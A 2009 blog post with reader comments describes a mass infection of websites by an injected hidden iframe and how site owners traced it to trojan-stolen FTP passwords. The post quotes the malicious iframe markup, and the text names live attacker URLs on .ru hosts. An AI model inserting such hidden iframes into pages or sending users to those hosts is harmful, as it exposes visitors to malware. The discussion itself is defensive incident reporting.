http://a3l.ru:8080/ts/in.cgi?pepsi85

Yesterday we had a problem where this site was infected with two lines of code linking to an iframe on an external server.

<iframe width=”125 height=”125 style=”visibility: hidden; src=”http://a3l.ru:8080/ts/in.cgi?pepsi85>

Other sites on the same server were also affected. A particular problem was wordpress sites like this one which stopped serving pages and instead threw errors.

Deleting the iframe from the affected files solved the problem.

Share and Enjoy:
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
July 2nd, 2009 in Security

Comments (8)

Vincent HuybrechtsJuly 2nd, 2009 at 11:13 pm

Hi,

Today I noticed the same code is appearing at the bottom of my wordpress powered site too. I re-uploaded all the wordpress files, including my theme. But the iframe is still there. And I really can’t find anything wrong in a file.

My site: http://www.startgrid.be (there’s a space between the bottom of the content and the bottom of the browserwindow wich isn’t supposed to be there.)

You say you deleted the affected files, can you tell me which files that were in your case ?

Thanks,
Vincent

adminJuly 10th, 2009 at 10:42 am

I believe it is all ‘index’ and ‘default’ pages affected. Look for ALL of these pages on your site. So if any files are called index and default re-upload them.

Ayolt TalenJuly 13th, 2009 at 12:59 pm

Dear Vincent, we’re having the same at this moment. Since friday, 4 of our servers have been attacked. The content of the page that is called in the iframe appears to contain a virus, so be carefull!

In our case, I could just search in windows for all files named ‘index.’ and ‘default.’ that had been changed in the past few days. In there, I found that they append the iframe-code right after the BODY-tag or at the end of the file if there is no bodytag.

I have been trying to find what is the vulnerability that let’s them in. Do you have any idea? We had the problem on a windows2000 machine with IIS and ColdFusion 5.0, MS SQL server 7. But we also had it on a newer machine with windows2003×64 with IIS and Coldfusion 7MX and SQL server 2005.

Did you find anything so far? Please let me know what type of machine you’re using.

Best regards and thanks,
Ayolt

GspJuly 27th, 2009 at 1:34 pm

I had the same problem yesterday with some sites, The easy solution is to delete the iframe lines, but the pages can be infected again, someone know how to close the backdoor?

thanks

adminJuly 30th, 2009 at 7:13 am

I was told that it was probably the FTP which had been compromised and that all passwords should be changed. This fits as the sites with different FTP passwords were not affected.

adminJuly 30th, 2009 at 7:19 am

Also, it is NOT a brute force attack as FTP logs show they got the password right first time. Probably a good idea to scan for trojan horses on your own machine.

LesAugust 1st, 2009 at 10:08 am

Hi,

We just had 20 sites Edit with http://x9y.ru:8080/ts/in.cgi?pepsi120 within 5 mintues, and on 8 diffrent servers. We tracked it down to a infected laptop in the office and it used cute FTP. We removed the laptop and fixed all the sites and changes the password on 19 sites left one test site with the same password, plug the laptop back in and within 2 mins of opening cute ftp the site was edited with the code.

The good news was we found the problem :) the bad news was it spread to to other computers on the network.

adminAugust 5th, 2009 at 1:57 pm

I found a Trojan on my work laptop which I believe was responsible as well. You need to clean the machine(s) you have the FTP passwords saved on before changing the passwords.

Leave a comment

Your comment